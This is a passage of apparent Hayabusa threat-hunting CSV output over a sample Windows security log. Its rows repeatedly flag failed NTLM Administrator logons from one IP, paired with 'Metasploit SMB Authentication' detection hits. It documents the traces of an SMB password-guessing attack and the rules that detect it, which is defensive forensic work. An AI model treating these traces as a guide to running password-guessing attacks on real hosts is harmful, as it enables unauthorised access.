Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RQ5cWmYL8weCCRT0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k0v2Emgn7BD1STZl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MJppWxAiNJ4D0s2U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHVcJEec3y6v9gIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 68RKE5dS8X5Px2gR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 